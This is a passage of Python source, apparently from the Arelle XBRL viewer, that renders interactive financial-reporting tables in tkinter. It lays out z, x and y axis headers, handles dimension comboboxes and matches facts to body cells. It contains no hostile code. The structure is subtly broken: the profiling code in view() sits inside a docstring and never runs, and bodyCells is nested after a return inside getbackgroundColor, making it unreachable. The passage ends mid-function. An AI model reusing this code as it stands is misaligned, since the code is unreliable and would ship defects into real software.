                if modelRoleTypes is not None and len(modelRoleTypes) > 0:
                    roledefinition = modelRoleTypes[0].definition
                    if roledefinition is None or roledefinition == "":
                        # fall back to last path segment of the linkrole URI
                        roledefinition = os.path.basename(tblLinkroleUri)
                    for table in tblAxisRelSet.rootConcepts:
                        # add table to menu if there's any entry
                        tblMenuEntries[roledefinition] = tblLinkroleUri
                        self.tablesToELR[table.objectId()] = tblLinkroleUri
                        break
    # replace prior menu entries with the freshly discovered tables
    self.tablesMenu.delete(0, self.tablesMenuLength)
    self.tablesMenuLength = 0
    self.tblELR = None
    for tblMenuEntry in sorted(tblMenuEntries.items()):
        tbl,elr = tblMenuEntry
        self.tablesMenu.add_command(label=tbl, command=lambda e=elr: self.view(viewTblELR=e)) # use this to activate profiling from menu selection:  , profile=True))
        self.tablesMenuLength += 1
        if self.tblELR is None:
            self.tblELR = elr # start viewing first ELR
def viewReloadDueToMenuAction(self, *args):
    """Persist the current option checkbox states into the controller
    config (written to disk on exit) and redraw the table."""
    if self.blockMenuEvents:
        return
    for optionName, optionVar in (("ignoreDimValidity", self.ignoreDimValidity),
                                  ("xAxisChildrenFirst", self.xAxisChildrenFirst),
                                  ("yAxisChildrenFirst", self.yAxisChildrenFirst)):
        self.options[optionName] = optionVar.get()
    self.view()
def setOpenBreakdownEntryRows(self, *args):
    """Prompt for the number of extra entry rows shown under open
    breakdowns; when the user confirms a value, store it and redraw."""
    import tkinter.simpledialog
    promptTitle = _("arelle - Open breakdown entry rows setting")
    promptText = _("The number of extra entry rows for open breakdowns is: {0} \n\n"
                   "(When a row header includes an open breakdown, such as \nfor typed dimension(s), this number of extra entry rows \nare provided below the table.)"
                   ).format(self.options["openBreakdownLines"])
    newValue = tkinter.simpledialog.askinteger(promptTitle, promptText, parent=self.tabWin)
    if newValue is None:
        return  # dialog cancelled; keep the current setting
    self.openBreakdownLines = self.options["openBreakdownLines"] = newValue
    self.viewReloadDueToMenuAction()
def view(self, viewTblELR=None, newInstance=None, profile=False):
    '''Resolve the selected table's axis structure and (re)render the grid:
    headers for the z, x and y axes, then the body cells.

    :param viewTblELR: extended link role of a specific table to show; None
        reuses/initializes the current selection
    :param newInstance: replacement modelXbrl after a save operation
    :param profile: debugging hook, see disabled snippet below

    if profile: # for debugging only, to use, uncomment in loadTablesMenu
        import cProfile, pstats, sys
        statsFile = "/Users/hermf/temp/profileRendering.bin"
        cProfile.runctx("self.view(viewTblELR=viewTblELR)", globals(), locals(), statsFile)
        priorStdOut = sys.stdout
        sys.stdout = open("/Users/hermf/temp/profileRendering.txt", "w")
        statObj = pstats.Stats(statsFile)
        statObj.strip_dirs()
        statObj.sort_stats("time")
        statObj.print_stats()
        statObj.print_callees()
        statObj.print_callers()
        sys.stdout.flush()
        sys.stdout.close()
        del statObj
        sys.stdout = priorStdOut
        os.remove(statsFile)
        return
    '''
    startedAt = time.time()
    self.blockMenuEvents += 1  # suppress re-entrant menu-driven redraws
    if newInstance is not None:
        self.modelXbrl = newInstance # a save operation has created a new instance to use subsequently
    clearZchoices = False
    if viewTblELR: # specific table selection
        self.tblELR = viewTblELR
        clearZchoices = True
    else: # first or subsequenct reloading (language, dimensions, other change)
        clearZchoices = self.zOrdinateChoices is None
        if clearZchoices: # also need first time initialization
            self.loadTablesMenu() # load menus (and initialize if first time
        viewTblELR = self.tblELR
    if not self.tblELR:
        return # no table to display
    if clearZchoices:
        self.zOrdinateChoices = {}
    # remove old widgets
    self.viewFrame.clearGrid()
    tblAxisRelSet, xTopStructuralNode, yTopStructuralNode, zTopStructuralNode = resolveAxesStructure(self, viewTblELR)
    colAdjustment = 1 if zTopStructuralNode is not None else 0  # extra column for the z-axis combobox
    self.table.resizeTable(self.dataFirstRow+self.dataRows-1, self.dataFirstCol+self.dataCols+colAdjustment-1, titleRows=self.dataFirstRow-1, titleColumns=self.dataFirstCol-1)
    self.hasTableFilters = bool(self.modelTable.filterRelationships)
    if tblAxisRelSet:
        # review row header wrap widths and limit to 2/3 of the frame width (all are screen units)
        fontWidth = tkFont.Font(font='TkTextFont').configure()['size']
        fontWidth = fontWidth * 3 // 2
        dataColsAllowanceWidth = (fontWidth * ENTRY_WIDTH_IN_CHARS + PADDING) * self.dataCols + PADDING
        frameWidth = self.viewFrame.winfo_width()
        if dataColsAllowanceWidth + self.rowHdrWrapLength > frameWidth:
            # shrink the row header area so data columns keep enough room
            if dataColsAllowanceWidth > frameWidth / 2:
                rowHdrAllowanceWidth = frameWidth / 2
            else:
                rowHdrAllowanceWidth = frameWidth - dataColsAllowanceWidth
            if self.rowHdrWrapLength > rowHdrAllowanceWidth:
                widthRatio = rowHdrAllowanceWidth / self.rowHdrWrapLength
                self.rowHdrWrapLength = rowHdrAllowanceWidth
                # columns at/below one character width are fixed; scale the rest
                fixedWidth = sum(w for w in self.rowHdrColWidth if w <= RENDER_UNITS_PER_CHAR)
                adjustableWidth = sum(w for w in self.rowHdrColWidth if w > RENDER_UNITS_PER_CHAR)
                if adjustableWidth> 0:
                    widthRatio = (rowHdrAllowanceWidth - fixedWidth) / adjustableWidth
                for i in range(len(self.rowHdrColWidth)):
                    w = self.rowHdrColWidth[i]
                    if w > RENDER_UNITS_PER_CHAR:
                        self.rowHdrColWidth[i] = int(w * widthRatio)
        # reset open-aspect entry caches before re-rendering headers
        self.aspectEntryObjectIdsNode.clear()
        self.aspectEntryObjectIdsCell.clear()
        self.factPrototypeAspectEntryObjectIds.clear()
        self.table.initHeaderCellValue((self.modelTable.genLabel(lang=self.lang, strip=True) or # use table label, if any
                                        self.roledefinition),
                                       0, 0, (self.dataFirstCol - 2),
                                       (self.dataFirstRow - 2),
                                       XbrlTable.TG_TOP_LEFT_JUSTIFIED)
        self.zAspectStructuralNodes = defaultdict(set)
        self.zAxis(1, zTopStructuralNode, clearZchoices)
        xStructuralNodes = []
        colsFoundPlus1, _, _, _ = self.xAxis(self.dataFirstCol, self.colHdrTopRow, self.colHdrTopRow + self.colHdrRows - 1,
                                             xTopStructuralNode, xStructuralNodes, self.xAxisChildrenFirst.get(), True, True)
        _, rowsFoundPlus1 = self.yAxis(1, self.dataFirstRow,
                                       yTopStructuralNode, self.yAxisChildrenFirst.get(), True, True)
        # shrink table to the rows/columns actually produced by the axes
        self.table.resizeTable(rowsFoundPlus1-1,
                               colsFoundPlus1+colAdjustment-1,
                               clearData=False)
        for fp in self.factPrototypes: # dereference prior facts
            if fp is not None:
                fp.clear()
        self.factPrototypes = []
        startedAt2 = time.time()
        self.bodyCells(self.dataFirstRow, yTopStructuralNode, xStructuralNodes, self.zAspectStructuralNodes, self.yAxisChildrenFirst.get())
        #print("bodyCells {:.2f}secs ".format(time.time() - startedAt2) + self.roledefinition)
        self.table.clearModificationStatus()
        self.table.disableUnusedCells()
        self.table.resizeTableCells()
        # data cells
        #print("body cells done")
    self.modelXbrl.profileStat("viewTable_" + os.path.basename(viewTblELR), time.time() - startedAt)
    #self.gridView.config(scrollregion=self.gridView.bbox(constants.ALL))
    self.blockMenuEvents -= 1
def zAxis(self, row, zStructuralNode, clearZchoices):
    """Render one z-axis header row (and recursively its children).

    When the node offers choice structural nodes, a combobox is created so
    the user can pick the z slice; for open filter nodes of explicit or
    typed dimensions extra entries allow member selection / value entry.

    :param row: 1-based header row for this z node
    :param zStructuralNode: the z-axis structural node to render (may be None)
    :param clearZchoices: True when prior z choices were discarded
    """
    if zStructuralNode is not None:
        label = zStructuralNode.header(lang=self.lang)
        xValue = self.dataFirstCol-1
        yValue = row-1
        self.table.initHeaderCellValue(label,
                                       xValue, yValue,
                                       0, 0,
                                       XbrlTable.TG_LEFT_JUSTIFIED,
                                       objectId=zStructuralNode.objectId())
        if zStructuralNode.choiceStructuralNodes is not None: # combo box
            valueHeaders = [''.ljust(zChoiceStructuralNode.indent * 4) + # indent if nested choices
                            (zChoiceStructuralNode.header(lang=self.lang) or '')
                            for zChoiceStructuralNode in zStructuralNode.choiceStructuralNodes]
            zAxisIsOpenExplicitDimension = False
            zAxisTypedDimension = None
            i = zStructuralNode.choiceNodeIndex # for aspect entry, use header selected
            # negative index means an entered (not chosen) aspect value
            comboBoxValue = None if i >= 0 else zStructuralNode.aspects.get('aspectValueLabel')
            chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
            aspect = None
            # find first non-DIMENSIONS aspect covered by the chosen node
            for aspect in chosenStructuralNode.aspectsCovered():
                if aspect != Aspect.DIMENSIONS:
                    break
            # for open filter nodes of explicit dimension allow selection of all values
            zAxisAspectEntryMode = False
            if isinstance(chosenStructuralNode.definitionNode, ModelFilterDefinitionNode):
                if isinstance(aspect, QName):
                    dimConcept = self.modelXbrl.qnameConcepts[aspect]
                    if dimConcept.isExplicitDimension:
                        if len(valueHeaders) != 1 or valueHeaders[0]: # not just a blank initial entry
                            valueHeaders.append("(all members)")
                        else:
                            valueHeaders.extend(
                                self.explicitDimensionFilterMembers(zStructuralNode, chosenStructuralNode))
                            zAxisAspectEntryMode = True
                        zAxisIsOpenExplicitDimension = True
                    elif dimConcept.isTypedDimension:
                        if (zStructuralNode.choiceStructuralNodes[0].contextItemBinding is None and
                            not valueHeaders[0]): # remove filterNode from the list
                            ''' this isn't reliable
                            if i > 0:
                                del zStructuralNode.choiceStructuralNodes[0]
                                del valueHeaders[0]
                                zStructuralNode.choiceNodeIndex = i = i-1
                            '''
                            if i >= 0:
                                chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
                            else:
                                chosenStructuralNode = zStructuralNode # use aspects of structural node (for entered typed value)
                        if not comboBoxValue and not valueHeaders:
                            comboBoxValue = "--please select--"
                            i = -1
                        valueHeaders.append("(enter typed member)")
                        zAxisTypedDimension = dimConcept
            combobox = self.table.initHeaderCombobox(self.dataFirstCol,
                                                     row-1,
                                                     colspan=0,
                                                     values=valueHeaders,
                                                     value=comboBoxValue,
                                                     selectindex=zStructuralNode.choiceNodeIndex if i >= 0 else None,
                                                     comboboxselected=self.onZComboBoxSelected)
            # stash state on the widget for the selection callback
            combobox.zStructuralNode = zStructuralNode
            combobox.zAxisIsOpenExplicitDimension = zAxisIsOpenExplicitDimension
            combobox.zAxisTypedDimension = zAxisTypedDimension
            combobox.zAxisAspectEntryMode = zAxisAspectEntryMode
            combobox.zAxisAspect = aspect
            combobox.zChoiceOrdIndex = row - 1
            combobox.objectId = zStructuralNode.objectId()
            # add aspect for chosen node
            self.setZStructuralNodeAspects(chosenStructuralNode)
        else:
            #process aspect on this node before child nodes in case it is overridden
            self.setZStructuralNodeAspects(zStructuralNode)
        # nested nodes override parent nodes
        for zStructuralNode in zStructuralNode.childStructuralNodes:
            self.zAxis(row + 1, zStructuralNode, clearZchoices)
def setZStructuralNodeAspects(self, zStructuralNode, add=True):
    """Register (add=True) or deregister (add=False) the node under every
    aspect of the current aspect model that it carries or inherits, in
    self.zAspectStructuralNodes."""
    def _register(aspectKey):
        nodeSet = self.zAspectStructuralNodes[aspectKey]
        if add:
            nodeSet.add(zStructuralNode)
        else:
            nodeSet.discard(zStructuralNode)
    for aspect in aspectModels[self.aspectModel]:
        # aspect may be custom-entered (typed dim) or inherited from other z axes
        if (aspect in zStructuralNode.aspects or
                zStructuralNode.hasAspect(aspect, inherit=True)):
            if aspect == Aspect.DIMENSIONS:
                # dimensions are keyed individually by dimension qname
                for dim in (zStructuralNode.aspectValue(Aspect.DIMENSIONS, inherit=True) or emptyList):
                    _register(dim)
            else:
                _register(aspect)
def onZComboBoxSelected(self, event):
    """Handle a selection in a z-axis combobox.

    Four cases: (1) aspect-entry mode - look up the entered header's aspect
    value; (2) "(all members)" on an open explicit dimension - reload the
    combobox with all members; (3) "(enter typed member)" - prompt for a
    typed dimension value and build its element; (4) ordinary choice -
    swap the chosen structural node's aspects. Cases 1, 3 and 4 redraw.
    """
    combobox = event.widget
    structuralNode = combobox.zStructuralNode
    if combobox.zAxisAspectEntryMode:
        aspectValue = structuralNode.aspectEntryHeaderValues.get(combobox.get())
        if aspectValue is not None:
            # remember the choice keyed by definition node and redraw
            self.zOrdinateChoices[structuralNode.definitionNode] = \
                structuralNode.aspects = {combobox.zAxisAspect: aspectValue, 'aspectValueLabel': combobox.get()}
            self.view() # redraw grid
    elif combobox.zAxisIsOpenExplicitDimension and combobox.get() == "(all members)":
        # reload combo box
        self.comboboxLoadExplicitDimension(combobox,
                                           structuralNode, # owner of combobox
                                           structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex]) # aspect filter node
        structuralNode.choiceNodeIndex = -1 # use entry aspect value
        combobox.zAxisAspectEntryMode = True
    elif combobox.zAxisTypedDimension is not None and combobox.get() == "(enter typed member)":
        # ask typed member entry
        import tkinter.simpledialog
        result = tkinter.simpledialog.askstring(_("Enter new typed dimension value"),
                                                combobox.zAxisTypedDimension.label(),
                                                parent=self.tabWin)
        if result:
            structuralNode.choiceNodeIndex = -1 # use entry aspect value
            # build the typed dimension member element from the entered text
            aspectValue = FunctionXfi.create_element(self.rendrCntx,
                                                    None,
                                                    (combobox.zAxisTypedDimension.typedDomainElement.qname, (), result))
            self.zOrdinateChoices[structuralNode.definitionNode] = \
                structuralNode.aspects = {combobox.zAxisAspect: aspectValue,
                                          Aspect.DIMENSIONS: {combobox.zAxisTypedDimension.qname},
                                          'aspectValueLabel': result}
            if not hasattr(structuralNode, "aspectEntryHeaderValues"): structuralNode.aspectEntryHeaderValues = {}
            structuralNode.aspectEntryHeaderValues[result] = aspectValue
            # prepend the new entry to the combobox's value list if absent
            valueHeaders = list(combobox["values"])
            if result not in valueHeaders: valueHeaders.insert(0, result)
            combobox["values"] = valueHeaders
            combobox.zAxisAspectEntryMode = True
            self.view() # redraw grid
    else:
        # remove prior combo choice aspect
        self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex], add=False)
        i = combobox.valueIndex
        self.zOrdinateChoices[combobox.zStructuralNode.definitionNode] = structuralNode.choiceNodeIndex = i
        # set current combo choice aspect
        self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[i])
        self.view() # redraw grid
def xAxis(self, leftCol, topRow, rowBelow, xParentStructuralNode, xStructuralNodes, childrenFirst, renderNow, atTop):
    """Recursively lay out and (optionally) render x-axis column headers.

    Called once to measure (renderNow=False) and again to render; appends
    non-abstract leaf nodes to xStructuralNodes in column order for the
    body-cell pass.

    :param leftCol: leftmost 1-based column for this subtree
    :param topRow: header row for this level
    :param rowBelow: bottom header row available to descendants
    :param childrenFirst: render children to the left of their parent totals
    :param renderNow: when True, actually draw cells; otherwise only measure
    :return: (rightCol, parentRow, widthToSpanParent, noDescendants)
    """
    if xParentStructuralNode is not None:
        parentRow = rowBelow
        noDescendants = True
        rightCol = leftCol
        widthToSpanParent = 0
        for xStructuralNode in xParentStructuralNode.childStructuralNodes:
            if not xStructuralNode.isRollUp:
                noDescendants = False
                isLabeled = xStructuralNode.isLabeled
                # abstract: has children but is not a closed definition/EU coord
                isAbstract = (xStructuralNode.isAbstract or
                              (xStructuralNode.childStructuralNodes and
                               not isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
                isNonAbstract = not isAbstract
                rightCol, row, width, leafNode = self.xAxis(leftCol, topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, # nested items before totals
                                                            childrenFirst, childrenFirst, False)
                if row - 1 < parentRow:
                    parentRow = row - 1
                #if not leafNode:
                #    rightCol -= 1
                if isNonAbstract and isLabeled:
                    width += ENTRY_WIDTH_SCREEN_UNITS # width for this label, in screen units
                widthToSpanParent += width
                if childrenFirst:
                    thisCol = rightCol
                else:
                    thisCol = leftCol
                if renderNow and isLabeled:
                    columnspan = (rightCol - leftCol + (1 if isNonAbstract else 0))
                    label = xStructuralNode.header(lang=self.lang,
                                                   returnGenLabel=isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))
                    if label != OPEN_ASPECT_ENTRY_SURROGATE:
                        xValue = leftCol-1
                        yValue = topRow-1
                        headerLabel = label if label else " "
                        self.table.initHeaderCellValue(headerLabel,
                                                       xValue, yValue,
                                                       columnspan-1,
                                                       ((row - topRow) if leafNode else 0),
                                                       XbrlTable.TG_CENTERED,
                                                       objectId=xStructuralNode.objectId(),
                                                       isRollUp=columnspan>1 and isNonAbstract and len(xStructuralNode.childStructuralNodes)<columnspan)
                    else:
                        # open aspect entry: render a combobox instead of a label
                        self.aspectEntryObjectIdsNode[xStructuralNode.aspectEntryObjectId] = xStructuralNode
                        self.aspectEntryObjectIdsCell[xStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
                                                                                                                           topRow-1,
                                                                                                                           values=self.aspectEntryValues(xStructuralNode),
                                                                                                                           objectId=xStructuralNode.aspectEntryObjectId,
                                                                                                                           comboboxselected=self.onAspectComboboxSelection)
                    if isNonAbstract:
                        xValue = thisCol - 1
                        # non-standard roles (e.g. documentation) go in rows
                        # just above the data rows
                        for i, role in enumerate(self.colHdrNonStdRoles):
                            j = (self.dataFirstRow
                                 - len(self.colHdrNonStdRoles) + i)-1
                            self.table.initHeaderCellValue(xStructuralNode.header(role=role, lang=self.lang),
                                                           xValue,
                                                           j,
                                                           0,
                                                           0,
                                                           XbrlTable.TG_CENTERED,
                                                           objectId=xStructuralNode.objectId())
                        xStructuralNodes.append(xStructuralNode)
                if isNonAbstract:
                    rightCol += 1
                if renderNow and not childrenFirst:
                    self.xAxis(leftCol + (1 if isNonAbstract else 0), topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, childrenFirst, True, False) # render on this pass
                leftCol = rightCol
        return (rightCol, parentRow, widthToSpanParent, noDescendants)
def yAxis(self, leftCol, row, yParentStructuralNode, childrenFirst, renderNow, atLeft):
    """Recursively lay out and (optionally) render y-axis row headers.

    Mirrors xAxis for the row dimension: one measuring pass and one
    rendering pass over the structural node tree.

    :param leftCol: 1-based header column for this nesting depth
    :param row: first 1-based row available to this subtree
    :param childrenFirst: render children above their parent totals
    :param renderNow: when True, actually draw cells; otherwise only measure
    :return: (nestedBottomRow, row) - bottom of this subtree and next free row
    """
    if yParentStructuralNode is not None:
        nestedBottomRow = row
        for yStructuralNode in yParentStructuralNode.childStructuralNodes:
            if not yStructuralNode.isRollUp:
                # abstract: has children but is not a closed definition/EU coord
                isAbstract = (yStructuralNode.isAbstract or
                              (yStructuralNode.childStructuralNodes and
                               not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
                isNonAbstract = not isAbstract
                isLabeled = yStructuralNode.isLabeled
                nestRow, nextRow = self.yAxis(leftCol + isLabeled, row, yStructuralNode, # nested items before totals
                                              childrenFirst, childrenFirst, False)
                topRow = row
                if childrenFirst and isNonAbstract:
                    row = nextRow
                if renderNow and isLabeled:
                    columnspan = self.rowHdrCols - leftCol + 1 if isNonAbstract or nextRow == row else 1
                    depth = yStructuralNode.depth
                    wraplength = (self.rowHdrColWidth[depth] if isAbstract else
                                  self.rowHdrWrapLength - sum(self.rowHdrColWidth[0:depth]))
                    if wraplength < 0:
                        wraplength = self.rowHdrColWidth[depth]
                    label = yStructuralNode.header(lang=self.lang,
                                                   returnGenLabel=isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)),
                                                   recurseParent=not isinstance(yStructuralNode.definitionNode, ModelFilterDefinitionNode))
                    if label != OPEN_ASPECT_ENTRY_SURROGATE:
                        xValue = leftCol-1
                        yValue = row-1
                        self.table.initHeaderCellValue(label if label is not None else " ",
                                                       xValue, yValue,
                                                       columnspan-1,
                                                       (nestRow - row if isAbstract else 1)-1,
                                                       (XbrlTable.TG_LEFT_JUSTIFIED
                                                        if isNonAbstract or nestRow == row
                                                        else XbrlTable.TG_CENTERED),
                                                       objectId=yStructuralNode.objectId(),
                                                       isRollUp=columnspan>1 and isNonAbstract and (len(yStructuralNode.childStructuralNodes)>1 or (len(yStructuralNode.childStructuralNodes)==1 and not(yStructuralNode.childStructuralNodes[0].isAbstract))))
                    else:
                        # open aspect entry: render a combobox instead of a label
                        self.aspectEntryObjectIdsNode[yStructuralNode.aspectEntryObjectId] = yStructuralNode
                        self.aspectEntryObjectIdsCell[yStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
                                                                                                                           row-1,
                                                                                                                           values=self.aspectEntryValues(yStructuralNode),
                                                                                                                           objectId=yStructuralNode.aspectEntryObjectId,
                                                                                                                           comboboxselected=self.onAspectComboboxSelection)
                    if isNonAbstract:
                        # non-standard roles (e.g. documentation/code) occupy
                        # the columns just left of the data columns
                        for i, role in enumerate(self.rowHdrNonStdRoles):
                            isCode = "code" in role
                            docCol = self.dataFirstCol - len(self.rowHdrNonStdRoles) + i-1
                            yValue = row-1
                            self.table.initHeaderCellValue(yStructuralNode.header(role=role, lang=self.lang),
                                                           docCol, yValue,
                                                           0, 0,
                                                           XbrlTable.TG_CENTERED if isCode else XbrlTable.TG_RIGHT_JUSTIFIED,
                                                           objectId=yStructuralNode.objectId())
                if isNonAbstract:
                    row += 1
                elif childrenFirst:
                    row = nextRow
                if nestRow > nestedBottomRow:
                    nestedBottomRow = nestRow + (isNonAbstract and not childrenFirst)
                if row > nestedBottomRow:
                    nestedBottomRow = row
                #if renderNow and not childrenFirst:
                #    dummy, row = self.yAxis(leftCol + 1, row, yStructuralNode, childrenFirst, True, False) # render on this pass
                if not childrenFirst:
                    dummy, row = self.yAxis(leftCol + isLabeled, row, yStructuralNode, childrenFirst, renderNow, False) # render on this pass
        return (nestedBottomRow, row)
def getbackgroundColor(self, factPrototype):
    """Choose the entry-cell background color for a fact's concept type.

    Mapping (see the branches below): shares/integer -> orange,
    percent/pure -> yellow, date -> green, string -> violet,
    anything else (assumed monetary) -> default.

    :param factPrototype: object whose .concept drives the choice
    :return: an XbrlTable.TG_BG_* color tag constant
    """
    bgColor = XbrlTable.TG_BG_DEFAULT # default monetary
    concept = factPrototype.concept
    if concept is None:  # fix: was "concept == None"; use identity test
        return bgColor
    isNumeric = concept.isNumeric
    # isMonetary = concept.isMonetary
    isInteger = concept.baseXbrliType in integerItemTypes
    isPercent = concept.typeQname in (qnPercentItemType, qnPureItemType)
    isString = concept.baseXbrliType in ("stringItemType", "normalizedStringItemType")
    isDate = concept.baseXbrliType in ("dateTimeItemType", "dateItemType")
    if isNumeric:
        if concept.isShares or isInteger:
            bgColor = XbrlTable.TG_BG_ORANGE
        elif isPercent:
            bgColor = XbrlTable.TG_BG_YELLOW
        # else assume isMonetary
    elif isDate:
        bgColor = XbrlTable.TG_BG_GREEN
    elif isString:
        bgColor = XbrlTable.TG_BG_VIOLET
    return bgColor  # fix: stray trailing semicolon removed
    def bodyCells(self, row, yParentStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst):
        # Render the data (body) cells for every labeled, non-abstract Y row
        # beneath yParentStructuralNode, matching instance facts against each
        # X/Y/Z aspect combination; returns the next free grid row index.
        if yParentStructuralNode is not None:
            dimDefaults = self.modelXbrl.qnameDimensionDefaults
            for yStructuralNode in yParentStructuralNode.childStructuralNodes:
                if yChildrenFirst:
                    # bottom-up layout: render descendant rows before this node's own row
                    row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
                if not (yStructuralNode.isAbstract or
                        (yStructuralNode.childStructuralNodes and
                         not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))) and yStructuralNode.isLabeled:
                    isYEntryPrototype = yStructuralNode.isEntryPrototype(default=False) # row to enter open aspects
                    # collect the aspects contributed by this Y node, keyed by aspect (or dimension qname)
                    yAspectStructuralNodes = defaultdict(set)
                    for aspect in aspectModels[self.aspectModel]:
                        if yStructuralNode.hasAspect(aspect):
                            if aspect == Aspect.DIMENSIONS:
                                for dim in (yStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
                                    yAspectStructuralNodes[dim].add(yStructuralNode)
                            else:
                                yAspectStructuralNodes[aspect].add(yStructuralNode)
                    yTagSelectors = yStructuralNode.tagSelectors
                    # data for columns of row
                    #print ("row " + str(row) + "yNode " + yStructuralNode.definitionNode.objectId() )
                    ignoreDimValidity = self.ignoreDimValidity.get()
                    # Reuse already computed facts partition in case of open Y axis
                    # NOTE(review): "True and" looks like a leftover debug toggle
                    if True and hasattr(yStructuralNode, "factsPartition"):
                        factsPartition = yStructuralNode.factsPartition
                    else:
                        factsPartition = None
                    for i, xStructuralNode in enumerate(xStructuralNodes):
                        isEntryPrototype = isYEntryPrototype or xStructuralNode.isEntryPrototype(default=False)
                        # same aspect collection as above, for the X column node
                        xAspectStructuralNodes = defaultdict(set)
                        for aspect in aspectModels[self.aspectModel]:
                            if xStructuralNode.hasAspect(aspect):
                                if aspect == Aspect.DIMENSIONS:
                                    for dim in (xStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
                                        xAspectStructuralNodes[dim].add(xStructuralNode)
                                else:
                                    xAspectStructuralNodes[aspect].add(xStructuralNode)
                        cellTagSelectors = yTagSelectors | xStructuralNode.tagSelectors
                        # resolve the effective value of every aspect for this cell from x/y/z contributions
                        cellAspectValues = {}
                        matchableAspects = set()
                        for aspect in _DICT_SET(xAspectStructuralNodes.keys()) | _DICT_SET(yAspectStructuralNodes.keys()) | _DICT_SET(zAspectStructuralNodes.keys()):
                            aspectValue = xStructuralNode.inheritedAspectValue(yStructuralNode,
                                                                               self, aspect, cellTagSelectors,
                                                                               xAspectStructuralNodes, yAspectStructuralNodes, zAspectStructuralNodes)
                            # value is None for a dimension whose value is to be not reported in this slice
                            if (isinstance(aspect, _INT) or # not a dimension
                                dimDefaults.get(aspect) != aspectValue or # explicit dim defaulted will equal the value
                                aspectValue is not None): # typed dim absent will be none
                                cellAspectValues[aspect] = aspectValue
                                matchableAspects.add(aspectModelAspect.get(aspect,aspect)) #filterable aspect from rule aspect
                        cellDefaultedDims = _DICT_SET(dimDefaults) - _DICT_SET(cellAspectValues.keys())
                        priItemQname = cellAspectValues.get(Aspect.CONCEPT)
                        concept = self.modelXbrl.qnameConcepts.get(priItemQname)
                        conceptNotAbstract = concept is None or not concept.isAbstract
                        value = None
                        objectId = None
                        justify = None
                        # prototype carries the cell's aspect values even when no fact matches yet
                        fp = FactPrototype(self, cellAspectValues)
                        if conceptNotAbstract:
                            # reduce set of matchable facts to those with pri item qname and have dimension aspects
                            facts = self.modelXbrl.factsByQname[priItemQname] if priItemQname else self.modelXbrl.factsInInstance
                            if self.hasTableFilters:
                                facts = self.modelTable.filterFacts(self.rendrCntx, facts)
                            for aspect in matchableAspects: # trim down facts with explicit dimensions match or just present
                                if isinstance(aspect, QName):
                                    aspectValue = cellAspectValues.get(aspect, None)
                                    if isinstance(aspectValue, ModelDimensionValue):
                                        if aspectValue.isExplicit:
                                            dimMemQname = aspectValue.memberQname # match facts with this explicit value
                                        else:
                                            dimMemQname = None  # match facts that report this dimension
                                    elif isinstance(aspectValue, QName):
                                        dimMemQname = aspectValue # match facts that have this explicit value
                                    elif aspectValue is None: # match typed dims that don't report this value
                                        dimMemQname = ModelXbrl.DEFAULT
                                    else:
                                        dimMemQname = None # match facts that report this dimension
                                    facts = facts & self.modelXbrl.factsByDimMemQname(aspect, dimMemQname)
                                    if len(facts)==0:
                                        break;
                            # first fully-matching fact supplies the cell's value and object id
                            for fact in facts:
                                if (all(aspectMatches(self.rendrCntx, fact, fp, aspect)
                                        for aspect in matchableAspects) and
                                    all(fact.context.dimMemberQname(dim,includeDefaults=True) in (dimDefaults[dim], None)
                                        for dim in cellDefaultedDims) and
                                        len(fp.context.qnameDims) == len(fact.context.qnameDims)):
                                    if yStructuralNode.hasValueExpression(xStructuralNode):
                                        value = yStructuralNode.evalValueExpression(fact, xStructuralNode)
                                    else:
                                        value = fact.effectiveValue
                                    objectId = fact.objectId()
                                    # we can now remove that fact if we picked up from the computed partition entry
                                    if factsPartition is not None:
                                        factsPartition.remove(fact)
                                    justify = XbrlTable.TG_RIGHT_JUSTIFIED if fact.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
                                    break
                        if (conceptNotAbstract and
                            (value is not None or ignoreDimValidity or isFactDimensionallyValid(self, fp) or
                             isEntryPrototype)):
                            # render the cell: combobox for enumerations / qname items / booleans,
                            # plain value cell otherwise
                            if objectId is None:
                                objectId = "f{0}".format(len(self.factPrototypes))
                                self.factPrototypes.append(fp) # for property views
                                for aspect, aspectValue in cellAspectValues.items():
                                    if isinstance(aspectValue, str) and aspectValue.startswith(OPEN_ASPECT_ENTRY_SURROGATE):
                                        self.factPrototypeAspectEntryObjectIds[objectId].add(aspectValue)
                            modelConcept = fp.concept
                            if (justify is None) and modelConcept is not None:
                                justify = XbrlTable.TG_RIGHT_JUSTIFIED if modelConcept.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
                            if modelConcept is not None and modelConcept.isEnumeration:
                                myValidationObject = ValidateXbrl(self.modelXbrl)
                                myValidationObject.modelXbrl = self.modelXbrl
                                enumerationSet = ValidateXbrlDimensions.usableEnumerationMembers(myValidationObject, modelConcept)
                                enumerationDict = dict()
                                for enumerationItem in enumerationSet:
                                    # we need to specify the concept linkrole to sort out between possibly many different labels
                                    enumerationDict[enumerationItem.label(linkrole=modelConcept.enumLinkrole)] = enumerationItem.qname
                                enumerationValues = sorted(list(enumerationDict.keys()))
                                enumerationQNameStrings = [""]+list(str(enumerationDict[enumerationItem]) for enumerationItem in enumerationValues)
                                enumerationValues = [""]+enumerationValues
                                try:
                                    selectedIdx = enumerationQNameStrings.index(value)
                                    effectiveValue = enumerationValues[selectedIdx]
                                except ValueError:
                                    effectiveValue = enumerationValues[0]
                                    selectedIdx = 0
                                xValue = self.dataFirstCol + i-1
